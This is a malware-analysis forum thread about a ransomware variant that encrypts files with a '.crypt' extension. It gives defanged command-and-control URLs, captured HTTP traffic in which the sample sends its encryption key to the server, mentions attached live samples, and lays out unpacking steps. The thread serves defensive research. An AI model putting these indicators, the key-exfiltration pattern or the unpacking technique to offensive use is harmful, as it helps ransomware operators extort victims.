[r3shl4k1sh]

Found this Ransome on a laptop.

The ransome encrypted the user files (add .crypt to the file name) and wants 300$.
in addition it downloads various malware to the computer.


Anybody know what is the procedure to follow in order to decrypt the user files?

VT 29/47
https://www.virustotal.com/en/file/a69f ... /analysis/

[thisisu]

Hi,

I believe the ransomware is known as "Birele".

Last I checked, there wasn't a fix for the newer variants of this. A decrypting tool was created by Fabian Wosar and is available here: http://tmp.emsisoft.com/fw/decrypt_birele.zip . You may want to give it a try.

[Horgh]

I don't think this is Birele, or at least it doesn't look like the version I saw.
This a delphi crap ransomware detected by ESET as Win32_Filecoder.NAG
The description of the malware correspond to what I found in the sample (strings, infection process)

http://www.virusradar.com/en/Win32_File ... escription

Send data to : hxxp://infominfo.net/add/add.php
hxxp://infominfo.net/webmail/src/login.php <- webmail login
hxxps://infominfo.net/webstat/ <- panel
hxxp://37.221.162.51/ <- 'bitcoin mining proxy'

In attach : aspack packed ransom + fully unpacked.

ransom.7z

pwd : infected
(494.09 KiB) Downloaded 72 times

Edit : traffic with the server (lol)

Code: Select all

POST /add/add.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Host: infominfo.net
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

password=JueLvpdtnDPKxajHTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Tue, 11 Jun 2013 11:51:49 GMT
Content-Type: text/html
Content-Length: 30
Connection: keep-alive
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Vary: Accept-Encoding

12616:KENNETHPRIO808@mail.com

Edit2 :

[Fabian Wosar]

Yeah, looks like a slightly updated variant of the crypto malware commonly referred to as Birele, essentially using the same encryption scheme and component (aeslib). The password is randomly generated and send off to a server who returns an ID as well as the email address to contact. Previous versions implemented their own TCP/IP and string based protocol. Looks like they switched to HTTP now:

Code: Select all

POST /add/add.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Host: infominfo.net
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

password=PZUzhXaWlPbXIcB


HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Tue, 11 Jun 2013 11:34:00 GMT
Content-Type: text/html
Content-Length: 30
Connection: keep-alive
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Vary: Accept-Encoding

12612:MICHAELCERN821@mail.com

The Birele authors made some mistakes in the first versions, one of which was to save the password temporarily on the system and forgetting to delete it or deleting it in an insecure way, which made decryption possible. Unfortunately they corrected them so decryption is no longer feasible without access to the server. So while technically my decrypter would still be able to decrypt encrypted files, it is useless without the correct key.

I also attached the unpacked sample if people are curious.

[r3shl4k1sh]

I was able to get to that by patching the exe but the malware starts to zero out all of the encrypted files, so it probably has some more protections inside.

[Fabian Wosar]

I was able to get to that by patching the exe but the malware starts to zero out all of the encrypted files, so it probably has some more protections inside.

Of course it does. I mean, what did you expect? Just because you patched the executable to show the "Unlock complete" message doesn't mean you magically get the correct key required to decrypt the files. Last time I checked AES doesn't operate on thin air alone ;).

The component used by the malware is available as source here by the way:
https://code.google.com/p/nadesiko/sour ... nt/aeslib/

Just in case you are curious :).

[r3shl4k1sh]

I have made a short analysis of this crap, and here is the key generator part:




i found that it is a randomly generated key of 15 bytes long consists of mixalpha letters.

more on
http://www.malwaredigger.com/2013/06/th ... mware.html

[thisisu]

Hi guys, sorry for the noob question but how did you find out this was compressed with ASPack (http://aspack.com/aspack.html ) ? I could not find that information with PEiD v0.95 or RDG Packer Detector v0.7.0. VT didn't tag it either. All I could tell was that it was not UPX due to no PUSHAD instruction. How did you know it wasn't PECompact, or PEtite (probably others too)? I'd just like to understand as well :) Thank you and great work as always.

[Fabian Wosar]

The file is actually packed/encrypted twice. The first layer is essentially a custom malware crypter. Doesn't do anything too fancy. Just allocates some memory using VirtualAlloc, then unpacks/decrypts the malware file into that buffer and then uses its custom PE loader to load and run the unpacked file. The malware file decrypted by the first layer is packed as well. This time with ASPack.

I have attached the intermediate step of the entire decryption/unpacking process where it is just a simple ASPacked file in case you are curious :).

[r3shl4k1sh]

Hi guys, sorry for the noob question but how did you find out this was compressed with ASPack (http://aspack.com/aspack.html ) ? I could not find that information with PEiD v0.95 or RDG Packer Detector v0.7.0. VT didn't tag it either. All I could tell was that it was not UPX due to no PUSHAD instruction. How did you know it wasn't PECompact, or PEtite (probably others too)? I'd just like to understand as well :)

It is actually packed with something else (some kind of runpe that create process and put the aspack file in that) and only after you dump it you have the Aspack file.

If you want to unpack the first part i suggest to you to set bp on CreateProcess (since it is actually runpe) afterwords you will see WriteProcessMemory calls , see where third argument pointing and dump that memory portion (i used OllyDump) this is the Aspack payload.

before you get to the CreateProcess this runpe use the GetSystemTime function in order to execute itself only in specific time:



set bp on @00138665 and change the BX to match the [ebp-2de] value, then it will proceed and you will get to the CreateProcess call.